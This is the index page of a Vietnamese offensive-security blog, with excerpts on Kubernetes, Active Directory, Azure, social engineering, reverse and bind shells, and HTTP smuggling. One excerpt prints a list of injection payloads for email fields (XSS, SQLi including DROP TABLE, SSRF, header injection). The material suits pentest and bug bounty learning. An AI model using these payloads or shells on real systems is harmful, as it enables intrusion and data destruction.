Tấn công các cụm Kubernetes qua lỗi API Kubelet misconfigure
Giới thiệu Kubelet là một agent trong từng node, có tác dụng quản lý tất cả container. Kubelet được giám sát, điều khiển bởi Control plane (hay còn gọi là Master), dùng để quản lý các node và các pod trong cluster. Ôn lại các kiến thức của Kubernetes, ta sẽ có một số khái…
Đọc tiếp
Pentest/Redteam Active Directory (AD)
Sr ảnh bìa to hơn ảnh chính :v anh em ấn vào ảnh dưới đây rồi phóng to nhé.
Đọc tiếp
![Tấn công Social Engineering toàn tập [part 2]](https://truongtn.files.wordpress.com/2022/12/social-engineering-attacks-1.jpg?w=600&h=800&crop=1)
Tấn công Social Engineering toàn tập [part 2]
Phân loại Social Engineering Social Engineering có thể được chia thành hai loại phổ biến: Human-Based Social Engineering Human-based là kỹ thuật Social Engineering liên quan đến sự tương tác giữa con người với con người để thu được thông tin mong muốn. Ví dụ như chúng ta phải gọi điện thoại đến phòng Help…
Đọc tiếp
Tấn công Social Engineering toàn tập [part 1]
Giới thiệu Trên thế giới, khi nói về vấn đề bảo mật thông tin, người ta không thể không nói đến Social Engineering – một kỹ thuật khai thác thông tin rất nguy hiểm, khó phát hiện, phòng chống và gây thiệt hại to lớn cho công tác bảo mật thông tin. Ngày nay, công…
Đọc tiếp
base64 payload encoded JSP bind Shell
https://github.com/truongtn/jsp-shell Throw server.jsp to target server. Use client.py to send commands.
Đọc tiếp
PHP Object Injection a.k.a PHP Insecure Deserialization
Ở PHP lổ hổng deserialization còn được gọi là PHP object injection. Để có thể hiểu về vấn đề này, trước tiên ta phải biết PHP serialize và deserialize một đối tượng như thế nào.PHP có 2 hàm là serialize() và unserialize() đảm nhận 2 nhiệm vụ này. Ví dụ serialize object User: Kết quả…
Đọc tiếp
![[Bug Bounty]Một số payload khi test trường email](https://truongtn.files.wordpress.com/2022/10/ff-miuuuaiaton.jpg?w=300&h=400&crop=1)
[Bug Bounty]Một số payload khi test trường email
Chép lại cho các ông copy nhé, nhất các ông :v XSStest+(alert(0))@example.comtest@example(alert(0)).com”alert(0)”@example.comTemplate injection”<%=7*7%>”@example.comtest+(${{7*7}})@example.comSQLi”‘OR1=1–‘”@example.com”mail’);DROP TABLE users;–“@example.comSSRFjohn.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1]Parameter pollutionvictim&email=attacker@example.com(Email) Header injection”%0d%0aContent-Length:%200%0d%0a%0d%0a”@example.com”recicpient@test.com>\r\nRCPT TO:<victim+”@test.com
Đọc tiếp
Reverseshell-Powercat-v2
Con hàng backconnect cơ bản, dùng khá okela, khá mượt. Link download: Muốn biến powershell thành exe thì dùng: Lưu ý: máy chủ C&C phải mở hai port.
Đọc tiếp
![[Azure RedTeam] Tấn công “Ủy quyền Bất Hợp Pháp”(Illicit Consent Attack) trên Azure](https://truongtn.files.wordpress.com/2022/10/map.drawio-1.png?w=300&h=400&crop=1)
[Azure RedTeam] Tấn công “Ủy quyền Bất Hợp Pháp”(Illicit Consent Attack) trên Azure
Giới thiệu Azure App Service là một dịch vụ dựa trên HTTP để lưu trữ các ứng dụng web, API REST và mobile backends. Bạn có thể phát triển các ứng dụng bằng ngôn ngữ lập trình yêu thích của mình, chẳng hạn như .NET, .NET Core, Java, Ruby, Node.js, PHP hoặc Python. Các ứng…
Đọc tiếp
Outlook Form/Rule attack cheat sheet
Bài viết ngắn gọn cho tấn công Outlook form/rule attack, cách sử dụng công cụ ruler. Nguyên lý của tấn công này là tất cả các rule, custom form đều sẽ được đồng bộ nên có thể đăng nhập ở bất kỳ máy nào để thiết lập script độc hại. Đọc thêm: Công cụ Link…
Đọc tiếp
![[Bugbounty Mindset Series] 2FA Bypass](https://truongtn.files.wordpress.com/2022/09/that-moment-when-you-realise-that-95-of-the-bug-bounty-hunters-are-script-kiddies.jpg?w=300&h=400&crop=1)
[Bugbounty Mindset Series] 2FA Bypass
Về mặt quản lý phiên: Về mặt Logic: Về mặt vượt ngưỡng: Khác: Tham khảo: twitter.com/hackerscrolls/status/1256276376019230720
Đọc tiếp
HTTP Request Smuggling toàn tập
I. HTTP request smuggling là gì? HTTP Request Smuggling là một kỹ thuật khai thác sự bất đồng bộ xử lý gói tin HTTP giữa máy chủ proxy/balancer/… với máy chủ web/backend. Lỗ hổng này thường gây ra các ảnh hưởng rất nghiệp trọng tới logic web thông thường. OK chúng ta sẽ cùng tìm…
Đọc tiếp
Loading…
Something went wrong. Please refresh the page and/or try again.
Nhat Truong Blog 